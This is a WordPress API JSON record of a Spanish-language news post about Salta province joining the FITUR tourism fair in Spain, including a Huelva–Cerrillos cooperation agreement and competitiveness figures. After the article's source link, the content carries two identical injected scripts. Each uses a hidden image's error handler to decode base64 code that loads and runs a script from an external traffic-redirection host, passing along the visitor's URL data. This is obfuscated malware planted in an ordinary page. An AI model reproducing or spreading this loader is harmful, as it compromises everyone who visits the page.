{"id":2092,"date":"2023-01-15T20:48:44","date_gmt":"2023-01-15T23:48:44","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2092"},"modified":"2025-08-14T00:25:24","modified_gmt":"2025-08-14T03:25:24","slug":"salta-trabaja-para-incrementar-el-arribo-de-turistas-internacionales","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2092","title":{"rendered":"Salta trabaja para incrementar el arribo de turistas internacionales"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#da2754\"><em>Salta participar\u00e1 de una nueva Feria Internacional de Turismo, a realizarse en Espa\u00f1a.<\/em><\/h3>\n\n\n\n<p>Estando pr\u00f3ximos al inicio de una nueva Feria Internacional de Turismo, a realizarse en Espa\u00f1a desde el pr\u00f3ximo 18 de enero y hasta el 23 del mismo, los destinos nacionales y en especial Salta definen sus objetivos en cuanto a su participaci\u00f3n.<\/p>\n\n\n\n<p>En el caso de la provincia, que integrar\u00e1 la delegaci\u00f3n nacional encabezada por el ministro de Turismo y Deportes de la Naci\u00f3n,&nbsp;<strong>Mat\u00edas Lammens<\/strong>, la agenda de trabajo tendr\u00e1 como eje central el crecimiento del destino en el mercado internacional. El equipo del destino Salta ser\u00e1 integrado por el ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;y el presidente de la C\u00e1mara de Turismo provincial,&nbsp;<strong>Gustavo Di Mecola<\/strong>.<\/p>\n\n\n\n<p>Continuando con la mirada estrat\u00e9gica de desarrollar el turismo de manera regional, Salta formar\u00e1 parte activa de todas las acciones que el Ente Norte (Salta, Jujuy, Tucum\u00e1n, Santiago del Estero, La Rioja y Catamarca) lleve adelante para profundizar la presencia de la regi\u00f3n en el \u00e1mbito internacional. En este punto se destaca la renovaci\u00f3n de un convenio con operadores tur\u00edsticos a fin de que estos contin\u00faen posicionando la experiencia \u201cNorte\u201d en los centros emisivos del mundo.<\/p>\n\n\n\n<p>Cabe destacar que la acci\u00f3n anteriormente mencionada se lleva adelante de forma conjunta con la C\u00e1mara Argentina de Turismo (CAT).<\/p>\n\n\n\n<p>El fortalecimiento de las relaciones de las internacionales ser\u00e1 otro de los puntos destacados de esta participaci\u00f3n ya que la delegaci\u00f3n provincial trabajar\u00e1 de manera conjunta con el embajador Ricardo Alfons\u00edn y su equipo durante la Feria. El hermanamiento de destinos ib\u00e9ricos y salte\u00f1os permitir\u00e1 potenciar el desarrollo bilateral del turismo.<\/p>\n\n\n\n<p>En ese marco, se firmar\u00e1 un convenio de cooperaci\u00f3n que incluir\u00e1 a los municipios de Huelva (Espa\u00f1a) y Cerrillos (Salta). La importancia de este documento radica en la vinculaci\u00f3n necesaria entre dos destinos que se destacan a nivel internacional por ser productores de algo \u00fanico como lo es el jam\u00f3n de cerdo alimentado a Bellota.<\/p>\n\n\n\n<p>\u201cPosicionar experiencias \u00fanicas en el mundo es un factor central al momento de planificar acciones que vayan a tener un impacto significativo respecto al arribo de turistas internacionales a Salta y avanzar en acciones de promoci\u00f3n conjunta con destinos reconocidos a nivel internacional es un gran camino para hacerlo\u201d, se\u00f1al\u00f3 el ministro Pe\u00f1a.<\/p>\n\n\n\n<p>Por otro lado, el funcionario destac\u00f3 que esta y todas las acciones a desarrollarse tanto en Fitur como durante el resto del 2023 son resultado de \u201cla decisi\u00f3n pol\u00edtica del gobernador Gustavo S\u00e1enz y su visi\u00f3n de seguir trabajando por el crecimiento de la actividad en la provincia\u201d. Adem\u00e1s el ministro hizo hincapi\u00e9 en la planificaci\u00f3n a mediano y largo plazo que Salta lleva adelante gracias al dise\u00f1o participativo&nbsp; del Plan Liderar.<\/p>\n\n\n\n<p>En ese aspecto, Gustavo Di Mecola, presidente de la C\u00e1mara de Turismo de Salta, se\u00f1al\u00f3 \u201cque el sector privado pueda estar presente en una Fitur sin dudas es una clara muestra de la decisi\u00f3n que ha tomado el Gobierno de la provincia de trabajar en equipo con el sector privado para que el turismo siga creciendo y esto se de con cada emprendedor siendo protagonista\u201d.<\/p>\n\n\n\n<p><strong>Salta es el tercer destino tur\u00edstico m\u00e1s competitivo del mundo<\/strong><\/p>\n\n\n\n<p>De acuerdo al informe realizado por el estudio Singerman &amp; Mak\u00f3n, la provincia adem\u00e1s, es la m\u00e1s competitiva del pa\u00eds en un comparativo de 28 destinos tur\u00edsticos del mundo. En el rubro gastronom\u00eda se ubica en el 1\u00b0 lugar y en hoteler\u00eda y city tours en el 3\u00b0.<\/p>\n\n\n\n<p>Tomando la variable de tipo de cambio libre, Salta se ubica como la tercera ciudad de mayor competitividad con una canasta tur\u00edstica de U$142. La provincia es solo superada por Bogot\u00e1 y La Paz (U$133). En cuanto a la comparativa nacional, el destino se ubica en el puesto n\u00famero 1, seguida por Iguaz\u00fa (U$163), Mendoza (U$184), Bariloche (U$239).<\/p>\n\n\n\n<p>\u201cLa competitividad de nuestro destino es absoluta al momento de analizarla con otros destinos, ya sean nacionales o internacionales, es por eso que la presencia de Salta en los mercados y ferias internacionales m\u00e1s importantes del mundo\u201d, concluy\u00f3 el ministro Pe\u00f1a.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-trabaja-para-incrementar-el-arribo-de-turistas-internacionales-87313\" target=\"_blank\" rel=\"noopener\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Salta participar\u00e1 de una nueva Feria Internacional de Turismo, a realizarse en Espa\u00f1a. Estando pr\u00f3ximos al inicio de una nueva Feria Internacional de Turismo, a realizarse en Espa\u00f1a desde el pr\u00f3ximo 18 de enero y hasta el 23 del mismo, los destinos nacionales y en especial Salta definen sus objetivos en cuanto a su participaci\u00f3n. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2093,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-2092","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2092"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2092"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2092\/revisions"}],"predecessor-version":[{"id":7206,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2092\/revisions\/7206"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2093"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2092"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2092"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2092"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}